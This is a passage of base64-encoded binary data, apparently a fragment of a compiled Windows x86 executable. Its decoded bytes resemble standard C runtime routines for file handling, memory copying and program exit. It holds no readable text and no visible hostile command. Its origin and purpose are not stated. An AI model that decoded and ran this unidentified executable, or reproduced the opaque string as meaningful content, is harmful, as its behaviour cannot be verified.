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1YUImFQOX//+jkUgAAWWY7hUDl//8PhTsDAAD/hTjl////hTDl//+LRRA5hUTl//8Pgvn9///pJwMAAIsOihP/hTjl//+IVA80iw6JRA846Q4DAAAzyYsGA8f2QASAD4S/AgAAi4U05f//iY1A5f//hNsPhcoAAACJhTzl//85TRAPhiADAADrBou1KOX//4uNPOX//4OlROX//wArjTTl//+NhUjl//87TRBzOYuVPOX///+FPOX//4oSQYD6CnUQ/4Uw5f//xgANQP+FROX//4gQQP+FROX//4G9ROX///8TAABywovYjYVI5f//K9hqAI2FLOX//1BTjYVI5f//UIsG/zQH/xVs4EAAhcAPhEICAACLhSzl//8BhTjl//87ww+MOgIAAIuFPOX//yuFNOX//ztFEA+CTP///+kgAgAAiYVE5f//gPsCD4XRAAAAOU0QD4ZNAgAA6waLtSjl//+LjUTl//+DpTzl//8AK4005f//jYVI5f//O00Qc0aLlUTl//+DhUTl//8CD7cSQUFmg/oKdRaDhTDl//8Cag1bZokYQECDhTzl//8Cg4U85f//AmaJEEBAgb085f///hMAAHK1i9iNhUjl//8r2GoAjYUs5f//UFONhUjl//9Qiwb/NAf/FWzgQACFwA+EYgEAAIuFLOX//wGFOOX//zvDD4xaAQAAi4VE5f//K4U05f//O0UQD4I/////6UABAAA5TRAPhnwBAACLjUTl//+DpTzl//8AK4005f//agKNhUj5//9eO00QczyLlUTl//8PtxIBtUTl//8DzmaD+gp1DmoNW2aJGAPGAbU85f//AbU85f//ZokQA8aBvTzl//+oBgAAcr8z9lZWaFUNAACNjfDr//9RjY1I+f//K8GZK8LR+FCLwVBWaOn9AAD/FXDgQACL2DveD4SXAAAAagCNhSzl//9Qi8MrxlCNhDXw6///UIuFKOX//4sA/zQH/xVs4EAAhcB0DAO1LOX//zvef8vrDP8VGOBAAImFQOX//zvef1yLhUTl//8rhTTl//+JhTjl//87RRAPggr////rP2oAjY0s5f//Uf91EP+1NOX///8w/xVs4EAAhcB0FYuFLOX//4OlQOX//wCJhTjl///rDP8VGOBAAImFQOX//4O9OOX//wB1bIO9QOX//wB0LWoFXjm1QOX//3UU6D7c//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